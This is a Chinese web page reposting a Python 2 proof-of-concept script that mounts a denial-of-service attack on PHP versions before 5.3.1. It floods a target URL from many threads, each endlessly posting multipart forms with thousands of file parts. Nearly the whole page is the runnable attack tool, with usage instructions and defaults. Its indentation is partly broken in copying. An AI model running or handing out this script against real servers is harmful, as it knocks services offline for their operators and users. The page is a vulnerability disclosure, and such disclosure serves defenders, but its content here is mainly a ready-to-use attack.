PHP 5.3.1版本之前的拒绝服务攻击漏洞(附测试代码)

# 

# PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 

# Bogdan Calin ([email protected]) 

# 

import httplib, urllib, sys, string, threading 

from string import replace 

from urlparse import urlparse

def usage(): 

        print "****************************************************************************" 

        print " PHP MultiPart Form-Data Denial of Service proof of concept" 

        print " Bogdan Calin ([email protected])" 

        print "" 

        print " Usage: php_mpfd_dos.py url [number_of_threads] [number_of_files] [data]" 

        print ""         

        print " [number_of_threads] - optional, default 10"         

        print " [number_of_files] - optional, default 15000"                 

        print " [data] - content of the files, by default it will create files containing" 

        print "           the string " 

        print ""                 

        print " Example: php_mpfd_dos.pyhttp://ubuntu/index.php"         

        print "****************************************************************************" 

         

class PhpMPFDDosThread ( threading.Thread ): 

        # Override Thread's __init__ method to accept the parameters needed: 

        def __init__ ( self, host, path, files ):         

                self.host = host 

                self.path = path 

                self.files = files 

                threading.Thread.__init__ ( self )                

        # run in loop 

        def run(self): 

                while(1): 

                        try: 

                                self.post_data() 

                        except: 

                                print "*", 

                 

        # post multipart_formdata         

        def post_data(self):         

            content_type, body = self.encode_multipart_formdata() 

            h = httplib.HTTPConnection(self.host) 

            headers = { 

                'User-Agent': 'Opera/9.20 (php_mpfd_dos;poc)', 

                'Accept': '*/*', 

                'Content-Type': content_type 

                } 

            h.request('POST', self.path, body, headers) 

            print ".",

        # encode multipart_formdata 

        def encode_multipart_formdata(self): 

                """ 

                adapted fromhttp://code.activestate.com/recipes/146306/ 

                files is a sequence of (name, filename, value) elements for data to be uploaded as files 

                Return (content_type, body) ready for httplib.HTTP instance 

                """ 

                BOUNDARY = '----------PHP_MPFD_DOS' 

                CRLF = '\r\n' 

                L = [] 

                for (key, filename, value) in self.files: 

                L.append('--' + BOUNDARY) 

                L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) 

                L.append('Content-Type: application/octet-stream') 

                L.append('') 

                L.append(value) 

                L.append('--' + BOUNDARY + '--') 

                L.append('') 

                body = CRLF.join(L) 

                content_type = 'multipart/form-data; boundary=%s' % BOUNDARY 

                return content_type, body

def main():     

        if len(sys.argv)<=1: 

                usage() 

                sys.exit()

        # default values 

        number_of_threads = 10 

        number_of_files = 15000 

        data = "" 

         

        if len(sys.argv)>2: 

                number_of_threads = int(sys.argv[2])

        if len(sys.argv)>3: 

                number_of_files = int(sys.argv[3])

        if len(sys.argv)>4: 

                data = sys.argv[4]         

         

        url = sys.argv[1] 

        print "[-] target: " + url

        # parse target url 

        up = urlparse(url) 

        host = up.netloc 

        path = up.path

        # prepare files 

        files = [] 

        for i in range(0, number_of_files): 

                files.append(('fu[]', 'f'+str(i), data)) 

         

        # start the threads 

        for x in xrange ( number_of_threads ): 

                PhpMPFDDosThread(host, path, files).start()

if __name__ == '__main__': 

    main()

  

你可能感兴趣的:(PHP)